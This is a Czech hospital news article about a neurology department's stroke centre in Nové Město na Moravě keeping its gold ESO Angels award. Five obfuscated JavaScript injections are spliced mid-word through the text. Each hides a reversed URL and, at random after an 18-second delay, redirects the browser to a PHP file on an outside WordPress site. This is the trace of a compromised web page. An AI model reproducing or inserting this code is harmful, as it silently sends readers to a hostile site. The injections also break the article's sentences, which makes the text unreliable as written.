Rainbow page separator

Neurologie obhájila zlaté ocenění za péči o pacienty s mrtvicí

Čtvrtek, 23. června 2022

Nové Měs[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to na Moravě / Čas od příjezdu pacienta po zahájení léčby, počet všech pacientů s podezřením na cévní mozkovou příhodu (CMP), kterým bylo provedeno CT vyšetření nebo magnetická rezonance a mnohá další kritéria jsou hodnotícími ukazateli mezinárodní soutěže o ocenění ESO Angels. Ik[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tové centrum neurologického oddělení novoměstské nemocnice znovu obhájilo zlaté ocenění ESO Angels Award za péči o pacienty s mrtvicí.
„Nemocnici jej udělila Evropská organizace pro CMP společně s iniciativou Angels, které sledují zvyšování kvality péče napříč evropskými centry,“ uvedl lékař neurologického oddělení Zoltán Németh.
Zdravotnické zařízení je součástí sítě ik[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tových center ČR od roku 2012. Základem úspěchu v péči o pacienty s mrtvicí je speciálně vyškolený mezioborový tým. Ten disponuje vybavením pro rychlou diagnostiku a léčbu cévních mozkových příhod v rané fázi, léčbu komplikací i zajištění následné rehabilitace. Ročně je na neurologickém oddělení hospitalizováno celkem třináct set pacientů, z [„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toho je asi 300 s mozkovou mrtvicí. „Přibližně pěti desítkám z nich je poskytnuta trombolytická léčba, což je léčebná me[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toda používaná k rozpuštění akutního uzávěru některé z mozkových tepen krevní sraženinou. V indikovaných případech zajišťujeme rychlý transport pacientů do komplexních cerebrovaskulárních center, kde může navazovat mechanické odstranění krevní sraženiny,“ dodal lékař.